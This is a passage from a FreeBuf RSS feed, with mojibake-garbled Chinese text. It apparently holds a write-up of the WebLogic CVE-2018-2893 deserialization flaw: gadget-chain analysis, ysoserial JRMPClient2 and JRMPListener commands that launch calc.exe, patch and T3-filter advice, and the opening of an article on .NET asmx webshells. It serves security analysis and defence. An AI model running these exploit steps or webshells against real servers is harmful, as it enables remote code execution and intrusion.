å¯ä»¥çœ‹åˆ°MapEntry调用的setValue调用了其ä¸çš„checkSetvalue方法。好了哪里调用了setValueå‘¢? 那就是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandler,它é‡å†™äº†ReadObjectååºåˆ—化的方法,其ä¸å°±è°ƒç”¨äº†MapEntryçš„SetValue方法。 ç„¶åŽWebLogicçš„T3å议走的都是ReadObjectæ–¹æ³•ï¼Œæ‰€ä»¥ä½ ç»™ä»–é€šè¿‡T3åè®®å‘é€WriteObject方法åºåˆ—化åŽçš„二进制å—节,他就自然的走上é¢çš„æ”»å‡»é“¾äº†ï¼Œä¸‹é¢é™„上完整攻击链。 LazyMap其实也是类似的,åªä¸è¿‡å€Ÿç”¨äº†åЍæ€ä»£ç†çš„æ–¹æ³•去实现。 å¯ä»¥çœ‹åˆ°Lazymapä¸çš„get方法调用了transfrom方法。 ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invokeæ–¹æ³•ä¸æŽ‰ç”¨äº†get方法,通过动æ€ä»£ç†æ–¹å¼å°±å¯ä»¥è°ƒç”¨è¿™ä¸ªæ–¹æ³•。 ç„¶åŽè°ˆè°ˆRMI绕过,RMIåˆéƒ½æ˜¯èµ°çš„åºåˆ—化和ååºåˆ—化,所以CVE-2017-3248å’ŒCVE-2018-2628 æ¼æ´žéƒ½æ˜¯è¿™ä¹ˆç»•过的。CVE-2018-2628æ˜¯å› ä¸ºè¡¥ä¸åªå°å µäº†CVE-2017-3248的接å£java.rmi.registry.Registry,然而CVE-2018-2628是利用了java.rmi.activation.Activator接å£ç»•过了黑åå•。 RMI是Remote Method Invocation的简称,是J2SE的一部分,能够让程åºå‘˜å¼€å‘出基于Java的分布å¼åº”用。一个RMI对象是一个远程Java对象,å¯ä»¥ä»Žå¦ä¸€ä¸ªJava虚拟机上(甚至跨过网络)调用它的方法,å¯ä»¥åƒè°ƒç”¨æœ¬åœ°Javaå¯¹è±¡çš„æ–¹æ³•ä¸€æ ·è°ƒç”¨è¿œç¨‹å¯¹è±¡çš„æ–¹æ³•ï¼Œä½¿åˆ†å¸ƒåœ¨ä¸åŒçš„JVMä¸çš„å¯¹è±¡çš„å¤–è¡¨å’Œè¡Œä¸ºéƒ½åƒæœ¬åœ°å¯¹è±¡ä¸€æ ·ã€‚ RMIä¼ è¾“è¿‡ç¨‹éƒ½ä½¿ç”¨åºåˆ—化和ååºåˆ—化,如果RMIæœåŠ¡ç«¯ç«¯å£å¯¹å¤–å¼€å‘,并且æœåŠ¡ç«¯ä½¿ç”¨äº†åƒApache CommonsCollections这类库,那么会导致远程命令执行。 RMIä¾èµ–于Java远程消æ¯äº¤æ¢åè®®JRMP(JavaRemote Messaging Protocol),该å议为Javaå®šåˆ¶ï¼Œè¦æ±‚æœåŠ¡ç«¯ä¸Žå®¢æˆ·ç«¯éƒ½ä¸ºJava编写, å› ä¸ºåŽæ¥è¡¥ä¸æŠŠCommons Collectionsåº“æ¼æ´žè¡¥æŽ‰äº†ï¼Œå射链没有了,所以这次的CVE-2018-2893是通过JDKçš„ååºåˆ—åŒ–æ¼æ´žå®žçŽ°çš„RCE也就是ysoserialä¸çš„JDK7u21å°±å¯ä»¥å®žçŽ°ç»•è¿‡ã€‚åŽæ¥è¿˜æœ‰å‡çº§ç‰ˆçš„JDK8u20是在JDK7u21å‘展æ¥çš„。JDK7u21利用链也是ååˆ†å¤æ‚的但是还是有很多共åŒç‚¹çš„,它也是借用了跟lazymap相åŒçš„动æ€ä»£ç†æ€è·¯ï¼Œèµ°çš„也是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invoke方法,这个走的是hashcode这个分支。 å› ä¸ºcommonscollection被干掉了ä¸èƒ½èµ°Lazymap那个分支调用InvokerTransformerä¸çš„transform方法。所以å¯ä»¥è‡ªå·±å†™äº†ä¸ªæ¶æ„çš„TemplatesImpl类对象自己å˜åˆ°LinkedHashSet 而LinkedHashSet继承了Hashset,而Hashsetåˆé‡å†™äº†ReadObject方法,并调用了put方法。 Putæ–¹æ³•ä¸æœ‰ä¸€å¤„hash绕过,已有详细分æžä¸å†è¿™é‡Œä»‹ç»ã€‚ 最åŽçœ‹ä¸‹åˆ©ç”¨ä»£ç ï¼Œå…ˆåˆ›å»ºäº†æ¶æ„çš„TemplatesImpl对象,然åŽé€šè¿‡InvocationHandler动æ€ä»£ç†è°ƒç”¨invoke方法,String zeroHashCodeStr =”f5a5a608″;这个就是为了hash绕过,使proxy.hashCode() == templates.hashCode() 在JDK7u21之åŽçš„版本和JDK8u20的版本ä¸ä¿®å¤äº†ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerï¼Œè¿™é‡Œå¦‚æžœæ£€æµ‹å‡ºä¸æ˜¯AnnotationType,就会退出抛出异常并退出ååºåˆ—化æµç¨‹ã€‚ 这里的绕过æ€è·¯å°±æ˜¯å…¶å®žvar1.defaultReadObject()å·²ç»å®Œæˆäº†ååºåˆ—åŒ–æˆ‘ä»¬çš„æ¶æ„åºåˆ—化代ç ,åªä¸è¿‡åŽé¢å¼‚常终æ¢äº†ï¼Œæ‰€ä»¥éœ€è¦æ‰¾ä¸€å¤„也抛出异常的readObjectæ–¹æ³•ä½†æ˜¯åŒæ—¶å¼‚常处ç†å•¥ä¹Ÿæ²¡æœ‰åšå°±å¯ä»¥äº†ã€‚ java.beans.beancontext.BeanContextSupportä¸å°±æœ‰è¿™ä¹ˆä¸€ä¸ªç‚¹å¯ä»¥åˆ©ç”¨ï¼Œå¯ä»¥çœ‹åˆ°continue。它返回到BeanContextSupport.readObject()方法ä¸ï¼Œç»§ç»æ‰§è¡Œåˆ°deserialize。 所以在JDk7u21基础上åºåˆ—化的二进制数æ®ä¸æ’入一段BeanContextSupportå¯¹è±¡ï¼Œè¿™ä¸ªå¯¹è±¡æ²¡æœ‰åŠ å…¥åˆ°åŠ¨æ€ä»£ç†ä¸ï¼Œåœ¨ååºåˆ—化完æˆåŽå°±ä¼šè¢«å¿½ç•¥ï¼Œä½†æ˜¯è¿˜æ˜¯ä¼šåˆ†é…一个Handleï¼Œå°±ä¼šç»•è¿‡æŠ›å‡ºå¼‚å¸¸ä¸æ–的问题,其他点跟JDK7u21çš„åˆ©ç”¨é“¾å°±ä¸€æ ·äº†ï¼Œä¸è¿‡è¿™é‡Œéœ€è¦æ›´æ”¹åç§»ï¼Œæœ‰æ–‡ç« è¯¦ç»†ä»‹ç»ä¸å†ç´¯è¿°ã€‚ ä¸‰ã€æ¼æ´žåˆ©ç”¨ 这里使用的是CVE-2018-2628åŠ ä¸ŠJDK7u21,从下é¢çš„图å¯ä»¥çœ‹åˆ°ä½¿ç”¨çš„æ˜¯JDK7u10, ç†è®ºä¸ŠJDK 7系列版本å°äºŽç‰äºŽ21的都å¯ä»¥æˆåŠŸè§¦å‘æ¼æ´žã€‚ >java-jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient2"192.168.1.105:1099" > payload_1 这个payload其实就是CVE-2018-2628çš„java.rmi.activation.Activatorç„¶åŽé€šè¿‡T3åè®®å‘é€ç»™WebLogic,WebLogicçš„RMI收到åŽé€šè¿‡JRMPå‘é€ç»™ysoserial写好的Server端 在192.168.1.105ä¸ŠåšæœåŠ¡ç«¯çš„ç›‘å¬ï¼Œå¦‚果收到WebLogicçš„RMIé€šä¿¡å°±ä¸‹å‘ JDK7u21çš„payloadç»™WebLogic弹出个计算器 java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099Jdk7u21 "calc.exe" å››ã€ä¿®å¤å»ºè®® 1) å®˜æ–¹è¡¥ä¸ Oracle官方已ç»åœ¨7æœˆçš„å…³é”®è¡¥ä¸æ›´æ–°ä¸ä¿®å¤äº†æ¤æ¼æ´žï¼Œå—å½±å“的用户请尽快å‡çº§æ›´æ–°è¿›è¡Œé˜²æŠ¤ã€‚ å¯ä½¿ç”¨æ£ç‰ˆè½¯ä»¶è®¸å¯è´¦æˆ·ç™»å½•https://support.oracle.com,下载最新补ä¸ã€‚ 2) æ‰‹å·¥ä¿®å¤ è‹¥è¦åˆ©ç”¨è¯¥æ¼æ´ž, 攻击者首先需è¦ä¸ŽWebLogic Serveræä¾›çš„T3æœåŠ¡ç«¯å£å»ºç«‹SOCKET连接, è¿ç»´äººå‘˜å¯é€šè¿‡æŽ§åˆ¶T3å议的访问æƒé™æ¥ä¸´æ—¶é˜»æ–æ¼æ´žåˆ©ç”¨ã€‚ WebLogicæä¾›äº†åå«â€œweblogic.security.net.ConnectionFilterImplâ€çš„默认连接ç›é€‰å™¨ã€‚该连接ç›é€‰å™¨å¯æŽ§åˆ¶æ‰€æœ‰ä¼ 入连接,通过修改æ¤è¿žæŽ¥ç›é€‰å™¨è§„则,å¯å¯¹T3åŠT3Så议进行访问控制。 *本文作者:alphalab,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
1629 <content:encoded><![CDATA[<h2>一ã€èƒŒæ™¯ä»‹ç»</h2>
1630<p><b style="color: rgb(0, 176, 80);">WebLogic是美国Oracleå…¬å¸å‡ºå“的一个Application Server,确切的说是一个基于JAVA EE架构的ä¸é—´ä»¶, WebLogic是用于开å‘ã€é›†æˆã€éƒ¨ç½²å’Œç®¡ç†å¤§åž‹åˆ†å¸ƒå¼Web应用ã€ç½‘络应用和数æ®åº“应用的Java应用æœåŠ¡å™¨ã€‚</b></p>
1631<h3>1.1 æ¼æ´žæè¿°</h3>
1632<p>Oracle官方在2018å¹´7月å‘å¸ƒäº†å…³é”®è¡¥ä¸æ›´æ–°ï¼Œå…¶ä¸åŒ…å«äº†Oracle WebLogic Server的一个高å±çš„WebLogicååºåˆ—åŒ–æ¼æ´žï¼Œé€šè¿‡è¯¥æ¼æ´žï¼Œæ”»å‡»è€…å¯ä»¥åœ¨æœªæŽˆæƒçš„æƒ…况下远程执行代ç 。 </p>
1633<p>æ¤æ¼æ´žäº§ç”ŸäºŽWebLogic T3æœåŠ¡ï¼Œå½“å¼€æ”¾WebLogic控制å°ç«¯å£ï¼ˆé»˜è®¤ä¸º7001端å£ï¼‰æ—¶ï¼ŒT3æœåŠ¡ä¼šé»˜è®¤å¼€å¯ï¼Œå› æ¤ä¼šé€ æˆè¾ƒå¤§å½±å“ã€‚ç»“åˆæ›¾ç»çˆ†å‡ºçš„WebLogic WLS ç»„ä»¶æ¼æ´žï¼Œä¸æŽ’é™¤ä¼šæœ‰æ”»å‡»è€…åˆ©ç”¨æ¼æ´žæŒ–矿的å¯èƒ½ï¼Œå› æ¤ï¼Œå»ºè®®å—å½±å“ä¼ä¸šç”¨æˆ·å°½å¿«éƒ¨ç½²é˜²æŠ¤æŽªæ–½ã€‚</p>
1634<h3>1.2 å—å½±å“的系统版本</h3>
1635<blockquote><p>WebLogic10.3.6.0</p>
1636<p>WebLogic12.1.3.0</p>
1637<p>WebLogic12.2.1.2</p>
1638<p>WebLogic12.2.1.3</p>
1639</blockquote>
1640<h3>1.3 æ¼æ´žç¼–å·</h3>
1641<p>CVE-2018-2893</p>
1642<h2>äºŒã€æ¼æ´žç»†èŠ‚</h2>
1643<p>这次的WebLogic (CVE-2018-2893)æ¼æ´žå’Œä¹‹å‰çš„JRMPåè®®æ¼æ´ž(CVE-2018-2628)æ¼æ´žæ˜¯åˆ†ä¸å¼€çš„,他是结åˆäº†RMI机制缺陷和JDKååºåˆ—åŒ–æ¼æ´žç»•过了WebLogic黑åå•,所以介ç»è¿™ä¸ªæ¼æ´žä¹‹å‰ï¼Œå…ˆå›žé¡¾ä¸‹ä¹‹å‰çš„æ¼æ´žåˆ©ç”¨é“¾ã€‚</p>
1644<p>在CVE-2015-4852 ä¸åˆ©ç”¨çš„æ˜¯Commons Collections 库,主æµçš„两大利用链是TransformedMapå’ŒLazymapï¼Œå…¶å®žä»–ä»¬çš„æ ¸å¿ƒéƒ½æ˜¯ç±»ä¼¼çš„ã€‚</p>
1645<p>先拿TransformedMapåšä¸ªä»‹ç»ï¼Œæ ¸å¿ƒæ˜¯å射机制。</p>
1646<h3><strong>å射机制</strong></h3>
1647<p>JAVAå射机制是在è¿è¡Œçжæ€ä¸ï¼Œå¯¹äºŽä»»æ„一个类,都能够知é“这个类的所有属性和方法;对于任æ„一个对象,都能够调用它的任æ„一个方法和属性;这ç§åЍæ€èŽ·å–的信æ¯ä»¥åŠåЍæ€è°ƒç”¨å¯¹è±¡çš„æ–¹æ³•的功能称为Javaè¯è¨€çš„å射机制。</p>
1648<p>å¯¹åº”å¾—ä»£ç æ˜¯è¿™æ ·,下é¢è¿™æ®µä»£ç å°±å¯ä»¥é€šè¿‡å射调用java.net.URLClassLoader.class,这个类å¯ä»¥æœ¬åœ°æˆ–者远程拉起任æ„çš„jaræ–‡ä»¶ï¼ŒåŒæ—¶ä¸ç”¨ç®¡æ–‡ä»¶ååŽç¼€ï¼Œç›´æŽ¥è¯»å–二进制的jar文件。下é¢è¿™ä¸ªæ˜¯æ‹‰èµ·äº†ä¸€ä¸ªåå¼¹Shell功能的jar文件。</p>
1649<p><img src="http://image.3001.net/images/20180719/15319914858436.png!small"></p>
1650<p>ç„¶åŽå†æ¥çœ‹çœ‹æ ¸å¿ƒçš„å射方法,InvokerTransformerä¸çš„transform方法。这个方法就是实现执行任æ„ç±»çš„æ ¸å¿ƒæ–¹æ³•ï¼Œä½†æ˜¯å¿…é¡»éœ€è¦é€šè¿‡ååºåˆ—化的方å¼è°ƒç”¨è¿™ä¸ªæ–¹æ³•。那么是如何调用的呢?</p>
1651<p><img src="http://image.3001.net/images/20180719/1531991493897.png!small"></p>
1652<p>在TransformedMap䏿œ‰ä¸‰ä¸ªæ–¹æ³•调用了transform方法</p>
1653<p><img src="http://image.3001.net/images/20180719/15319915003634.png!small"></p>
1654<p>下é¢å°±æ˜¯æ‰¾åˆ°è°è°ƒç”¨äº†è¿™3个方法ä¸çš„一个,å¯ä»¥çœ‹åˆ°TransformdMap继承了父类,所有的类都实现了åºåˆ—化接å£ï¼Œä¸ç„¶æ— 法ååºåˆ—化,这个ä¸å†é‡å¤å¼ºè°ƒ</p>
1655<p><img src="http://image.3001.net/images/20180719/15319915082264.png!small"></p>
1656<p>跟进这个父类</p>
1657<p><img src="http://image.3001.net/images/20180719/15319915265605.png!small"></p>
1658<p>å¯ä»¥çœ‹åˆ°MapEntry调用的setValue调用了其ä¸çš„checkSetvalue方法。好了哪里调用了setValueå‘¢?</p>
1659<p>那就是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandler,它é‡å†™äº†ReadObjectååºåˆ—化的方法,其ä¸å°±è°ƒç”¨äº†MapEntryçš„SetValue方法。</p>
1660<p><img src="http://image.3001.net/images/20180719/15319915322704.png!small"></p>
1661<p>ç„¶åŽWebLogicçš„T3å议走的都是ReadObjectæ–¹æ³•ï¼Œæ‰€ä»¥ä½ ç»™ä»–é€šè¿‡T3åè®®å‘é€WriteObject方法åºåˆ—化åŽçš„二进制å—节,他就自然的走上é¢çš„æ”»å‡»é“¾äº†ï¼Œä¸‹é¢é™„上完整攻击链。</p>
1662<p><img src="http://image.3001.net/images/20180719/15319915327269.png!small"></p>
1663<p>LazyMap其实也是类似的,åªä¸è¿‡å€Ÿç”¨äº†åЍæ€ä»£ç†çš„æ–¹æ³•去实现。</p>
1664<p><img src="http://image.3001.net/images/20180719/15319915352326.png!small"></p>
1665<p>å¯ä»¥çœ‹åˆ°Lazymapä¸çš„get方法调用了transfrom方法。</p>
1666<p>ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invokeæ–¹æ³•ä¸æŽ‰ç”¨äº†get方法,通过动æ€ä»£ç†æ–¹å¼å°±å¯ä»¥è°ƒç”¨è¿™ä¸ªæ–¹æ³•。</p>
1667<p><img src="http://image.3001.net/images/20180719/15319915458850.png!small"></p>
1668<p>ç„¶åŽè°ˆè°ˆRMI绕过,RMIåˆéƒ½æ˜¯èµ°çš„åºåˆ—化和ååºåˆ—化,所以CVE-2017-3248å’ŒCVE-2018-2628 æ¼æ´žéƒ½æ˜¯è¿™ä¹ˆç»•过的。CVE-2018-2628æ˜¯å› ä¸ºè¡¥ä¸åªå°å µäº†CVE-2017-3248的接å£java.rmi.registry.Registry,然而CVE-2018-2628是利用了java.rmi.activation.Activator接å£ç»•过了黑åå•。</p>
1669<p>RMI是Remote Method Invocation的简称,是J2SE的一部分,能够让程åºå‘˜å¼€å‘出基于Java的分布å¼åº”用。一个RMI对象是一个远程Java对象,å¯ä»¥ä»Žå¦ä¸€ä¸ªJava虚拟机上(甚至跨过网络)调用它的方法,å¯ä»¥åƒè°ƒç”¨æœ¬åœ°Javaå¯¹è±¡çš„æ–¹æ³•ä¸€æ ·è°ƒç”¨è¿œç¨‹å¯¹è±¡çš„æ–¹æ³•ï¼Œä½¿åˆ†å¸ƒåœ¨ä¸åŒçš„JVMä¸çš„å¯¹è±¡çš„å¤–è¡¨å’Œè¡Œä¸ºéƒ½åƒæœ¬åœ°å¯¹è±¡ä¸€æ ·ã€‚</p>
1670<p>RMIä¼ è¾“è¿‡ç¨‹éƒ½ä½¿ç”¨åºåˆ—化和ååºåˆ—化,如果RMIæœåŠ¡ç«¯ç«¯å£å¯¹å¤–å¼€å‘,并且æœåŠ¡ç«¯ä½¿ç”¨äº†åƒApache CommonsCollections这类库,那么会导致远程命令执行。</p>
1671<p>RMIä¾èµ–于Java远程消æ¯äº¤æ¢åè®®JRMP(JavaRemote Messaging Protocol),该å议为Javaå®šåˆ¶ï¼Œè¦æ±‚æœåŠ¡ç«¯ä¸Žå®¢æˆ·ç«¯éƒ½ä¸ºJava编写,</p>
1672<p>å› ä¸ºåŽæ¥è¡¥ä¸æŠŠCommons Collectionsåº“æ¼æ´žè¡¥æŽ‰äº†ï¼Œå射链没有了,所以这次的CVE-2018-2893是通过JDKçš„ååºåˆ—åŒ–æ¼æ´žå®žçŽ°çš„RCE也就是ysoserialä¸çš„JDK7u21å°±å¯ä»¥å®žçŽ°ç»•è¿‡ã€‚åŽæ¥è¿˜æœ‰å‡çº§ç‰ˆçš„JDK8u20是在JDK7u21å‘展æ¥çš„。JDK7u21利用链也是ååˆ†å¤æ‚的但是还是有很多共åŒç‚¹çš„,它也是借用了跟lazymap相åŒçš„动æ€ä»£ç†æ€è·¯ï¼Œèµ°çš„也是ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerçš„invoke方法,这个走的是hashcode这个分支。</p>
1673<p><img src="http://image.3001.net/images/20180719/15319915564875.png!small"></p>
1674<p>å› ä¸ºcommonscollection被干掉了ä¸èƒ½èµ°Lazymap那个分支调用InvokerTransformerä¸çš„transform方法。所以å¯ä»¥è‡ªå·±å†™äº†ä¸ªæ¶æ„çš„TemplatesImpl类对象自己å˜åˆ°LinkedHashSet</p>
1675<p><img src="http://image.3001.net/images/20180719/15319915645276.png!small"></p>
1676<p>而LinkedHashSet继承了Hashset,而Hashsetåˆé‡å†™äº†ReadObject方法,并调用了put方法。</p>
1677<p><img src="http://image.3001.net/images/20180719/15319915737939.png!small"></p>
1678<p>Putæ–¹æ³•ä¸æœ‰ä¸€å¤„hash绕过,已有详细分æžä¸å†è¿™é‡Œä»‹ç»ã€‚</p>
1679<p><img src="http://image.3001.net/images/20180719/15319915803753.png!small"></p>
1680<p>最åŽçœ‹ä¸‹åˆ©ç”¨ä»£ç ï¼Œå…ˆåˆ›å»ºäº†æ¶æ„çš„TemplatesImpl对象,然åŽé€šè¿‡InvocationHandler动æ€ä»£ç†è°ƒç”¨invoke方法,String zeroHashCodeStr =”f5a5a608″;这个就是为了hash绕过,使proxy.hashCode() == templates.hashCode()</p>
1681<p><img src="http://image.3001.net/images/20180719/15319915889102.png!small"></p>
1682<p>在JDK7u21之åŽçš„版本和JDK8u20的版本ä¸ä¿®å¤äº†ç»å…¸çš„sun.reflect.annotation.AnnotationInvocationHandlerï¼Œè¿™é‡Œå¦‚æžœæ£€æµ‹å‡ºä¸æ˜¯AnnotationType,就会退出抛出异常并退出ååºåˆ—化æµç¨‹ã€‚</p>
1683<p><img src="http://image.3001.net/images/20180719/15319915978548.png!small"></p>
1684<p>这里的绕过æ€è·¯å°±æ˜¯å…¶å®žvar1.defaultReadObject()å·²ç»å®Œæˆäº†ååºåˆ—åŒ–æˆ‘ä»¬çš„æ¶æ„åºåˆ—化代ç ,åªä¸è¿‡åŽé¢å¼‚常终æ¢äº†ï¼Œæ‰€ä»¥éœ€è¦æ‰¾ä¸€å¤„也抛出异常的readObjectæ–¹æ³•ä½†æ˜¯åŒæ—¶å¼‚常处ç†å•¥ä¹Ÿæ²¡æœ‰åšå°±å¯ä»¥äº†ã€‚</p>
1685<p>java.beans.beancontext.BeanContextSupportä¸å°±æœ‰è¿™ä¹ˆä¸€ä¸ªç‚¹å¯ä»¥åˆ©ç”¨ï¼Œå¯ä»¥çœ‹åˆ°continue。它返回到BeanContextSupport.readObject()方法ä¸ï¼Œç»§ç»æ‰§è¡Œåˆ°deserialize。</p>
1686<p><img src="http://image.3001.net/images/20180719/1531991606811.png!small"></p>
1687<p>所以在JDk7u21基础上åºåˆ—化的二进制数æ®ä¸æ’入一段BeanContextSupportå¯¹è±¡ï¼Œè¿™ä¸ªå¯¹è±¡æ²¡æœ‰åŠ å…¥åˆ°åŠ¨æ€ä»£ç†ä¸ï¼Œåœ¨ååºåˆ—化完æˆåŽå°±ä¼šè¢«å¿½ç•¥ï¼Œä½†æ˜¯è¿˜æ˜¯ä¼šåˆ†é…一个Handleï¼Œå°±ä¼šç»•è¿‡æŠ›å‡ºå¼‚å¸¸ä¸æ–的问题,其他点跟JDK7u21çš„åˆ©ç”¨é“¾å°±ä¸€æ ·äº†ï¼Œä¸è¿‡è¿™é‡Œéœ€è¦æ›´æ”¹åç§»ï¼Œæœ‰æ–‡ç« è¯¦ç»†ä»‹ç»ä¸å†ç´¯è¿°ã€‚</p>
1688<h2>ä¸‰ã€æ¼æ´žåˆ©ç”¨</h2>
1689<p>这里使用的是CVE-2018-2628åŠ ä¸ŠJDK7u21,从下é¢çš„图å¯ä»¥çœ‹åˆ°ä½¿ç”¨çš„æ˜¯JDK7u10, ç†è®ºä¸ŠJDK 7系列版本å°äºŽç‰äºŽ21的都å¯ä»¥æˆåŠŸè§¦å‘æ¼æ´žã€‚</p>
1690<p><img src="http://image.3001.net/images/20180719/15319916479818.png!small"></p>
1691<pre><code>>java-jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient2"192.168.1.105:1099" > payload_1</code></pre>
1692<p><img src="http://image.3001.net/images/20180719/15319916543636.png!small"></p>
1693<p>这个payload其实就是CVE-2018-2628çš„java.rmi.activation.Activatorç„¶åŽé€šè¿‡T3åè®®å‘é€ç»™WebLogic,WebLogicçš„RMI收到åŽé€šè¿‡JRMPå‘é€ç»™ysoserial写好的Server端</p>
1694<p><img src="http://image.3001.net/images/20180719/15319921033420.png!small"></p>
1695<p>在192.168.1.105ä¸ŠåšæœåŠ¡ç«¯çš„ç›‘å¬ï¼Œå¦‚果收到WebLogicçš„RMIé€šä¿¡å°±ä¸‹å‘ JDK7u21çš„payloadç»™WebLogic弹出个计算器</p>
1696<pre><code>java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099Jdk7u21 "calc.exe"</code></pre>
1697<p><img src="http://image.3001.net/images/20180719/15319921084606.png!small"></p>
1698<p><img src="http://image.3001.net/images/20180719/15319923557542.png!small"></p>
1699<h2>å››ã€ä¿®å¤å»ºè®®</h2>
1700<h3>1) 官方补ä¸</h3>
1701<p>Oracle官方已ç»åœ¨7æœˆçš„å…³é”®è¡¥ä¸æ›´æ–°ä¸ä¿®å¤äº†æ¤æ¼æ´žï¼Œå—å½±å“的用户请尽快å‡çº§æ›´æ–°è¿›è¡Œé˜²æŠ¤ã€‚</p>
1702<p>å¯ä½¿ç”¨æ£ç‰ˆè½¯ä»¶è®¸å¯è´¦æˆ·ç™»å½•<a href="https://support.oracle.com/">https://support.oracle.com</a>,下载最新补ä¸ã€‚</p>
1703<h3>2) 手工修å¤</h3>
1704<p>è‹¥è¦åˆ©ç”¨è¯¥æ¼æ´ž, 攻击者首先需è¦ä¸ŽWebLogic Serveræä¾›çš„T3æœåŠ¡ç«¯å£å»ºç«‹SOCKET连接, è¿ç»´äººå‘˜å¯é€šè¿‡æŽ§åˆ¶T3å议的访问æƒé™æ¥ä¸´æ—¶é˜»æ–æ¼æ´žåˆ©ç”¨ã€‚</p>
1705<p>WebLogicæä¾›äº†åå«â€œweblogic.security.net.ConnectionFilterImplâ€çš„默认连接ç›é€‰å™¨ã€‚该连接ç›é€‰å™¨å¯æŽ§åˆ¶æ‰€æœ‰ä¼ 入连接,通过修改æ¤è¿žæŽ¥ç›é€‰å™¨è§„则,å¯å¯¹T3åŠT3Så议进行访问控制。</p>
1706<p><b style="color: rgb(159, 163, 168);">*本文作者:alphalab,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1707]]></content:encoded>
1708 <wfw:commentRss>http://www.freebuf.com/vuls/178105.html/feed</wfw:commentRss>
1709 <slash:comments>0</slash:comments>
1710 </item>
1711 <item>
1712 <title>探索基于.NET下实现一å¥è¯æœ¨é©¬ä¹‹Asmx篇</title>
1713 <link>http://www.freebuf.com/articles/web/178010.html</link>
1714 <comments>http://www.freebuf.com/articles/web/178010.html#comments</comments>
1715 <pubDate>Wed, 25 Jul 2018 01:00:31 +0000</pubDate>
1716 <dc:creator>360云影实验室</dc:creator>
1717 <category><![CDATA[WEB安全]]></category>
1718 <category><![CDATA[.Net]]></category>
1719 <category><![CDATA[asmx]]></category>
1720
1721 <guid isPermaLink="false">http://www.freebuf.com/?p=178010</guid>
1722 <description><![CDATA[0×01 å‰è¨€ 上篇介ç»äº†ä¸€èˆ¬å¤„ç†ç¨‹åºï¼ˆashx)的工作原ç†ä»¥åŠå®žçް䏀å¥è¯æœ¨é©¬çš„过程,今天接ç€ä»‹ç»Web Service程åºï¼ˆasmx)下的工作原ç†å’Œå¦‚何实现一å¥è¯æœ¨é©¬ï¼Œå½“然介ç»ä¹‹å‰ç¬”者找到了一款asmx马儿 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx ï¼Œä¾æ—§æ˜¯ä¸€ä¸ªå¤§é©¬å¦‚下图: è¿™ä¸ªè¿˜åªæ˜¯å¯¹å®¢æˆ·ç«¯çš„èœåˆ€åšäº†é€‚é…å¯ç”¨ï¼Œæš‚æ—¶ä¸ç¬¦åˆä¸€å¥è¯æœ¨é©¬çš„ç‰¹ç‚¹å“ˆï¼Œè‡³äºŽè¦æ‰“é€ ä¸€æ¬¾å±…å®¶æ—…è¡Œå¿…å¤‡çš„èœåˆ€é©¬ï¼Œè¿˜å¾—从原ç†ä¸Šæžæ¸…楚 asmxçš„è¿è¡Œè¿‡ç¨‹ã€‚  0×02 ç®€ä»‹å’ŒåŽŸç† Web Service是一个基于å¯ç¼–程的web的应用程åºï¼Œç”¨äºŽå¼€å‘分布å¼çš„互æ“作的应用程åºï¼Œä¹Ÿæ˜¯ä¸€ç§webæœåŠ¡ï¼ŒWeb Service的主è¦ç›®æ ‡æ˜¯è·¨å¹³å°çš„å¯äº’æ“ä½œæ€§ï¼Œä¸ºäº†å®žçŽ°è¿™ä¸€ç›®æ ‡Web Service 完全基于XMLï¼ˆå¯æ‰©å±•æ ‡è®°è¯è¨€ï¼‰ã€XSD(XML Schema)ç‰ç‹¬ç«‹äºŽå¹³å°ã€ç‹¬ç«‹äºŽè½¯ä»¶ä¾›åº”å•†çš„æ ‡å‡†ï¼Œæ˜¯åˆ›å»ºå¯äº’æ“作的ã€åˆ†å¸ƒå¼åº”用程åºçš„æ–°å¹³å°ã€‚简å•çš„æ¥è¯´Web Service具备三个è¦ç´ SOAP(Simple Object Access Protocol)ã€WSDL(WebServicesDescriptionLanguage)ã€UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAPç”¨æ¥æè¿°ä¼ é€’ä¿¡æ¯çš„æ ¼å¼ï¼Œ WSDL ç”¨æ¥æè¿°å¦‚ä½•è®¿é—®å…·ä½“çš„æŽ¥å£ï¼Œ UDDI用æ¥ç®¡ç†ï¼Œåˆ†å‘查询webService ï¼Œä¹Ÿå› æ¤ä½¿ç”¨Web Service有许多优点,例如å¯ä»¥è·¨å¹³å°å·¥ä½œã€éƒ¨ç½²å‡çº§ç»´æŠ¤èµ·æ¥ç®€å•方便ã€å®žçŽ°å¤šæ•°æ®å¤šä¸ªæœåŠ¡çš„èšåˆä½¿ç”¨ç‰ç‰ã€‚å†ç»“åˆä¸‹å›¾è¯´æ˜Žä¸€ä¸‹WebService工作的æµç¨‹ æ— è®ºä½¿ç”¨ä»€ä¹ˆå·¥å…·ã€è¯è¨€ç¼–写WebService,都å¯ä»¥ä½¿ç”¨ SOAP å议通过 HTTP调用,创建 WebService åŽï¼Œä»»ä½•è¯è¨€ã€å¹³å°çš„客户都å¯ä»¥é˜…读 WSDL 文档æ¥è°ƒç”¨ WebService ï¼ŒåŒæ—¶å®¢æˆ·ç«¯ä¹Ÿå¯ä»¥æ ¹æ® WSDL æè¿°æ–‡æ¡£ç”Ÿæˆä¸€ä¸ª SOAP 请求信æ¯å¹¶å‘é€åˆ°WebæœåŠ¡å™¨ï¼ŒWebæœåС噍å†å°†è¯·æ±‚转å‘ç»™WebService 请求处ç†å™¨ã€‚ 对于.Net而言,WebService请求处ç†å™¨åˆ™æ˜¯ä¸€ä¸ª .NET Framework 自带的 ISAPI Extension。Web请求处ç†å™¨ç”¨äºŽè§£æžæ”¶åˆ°çš„SOAP请求,调用 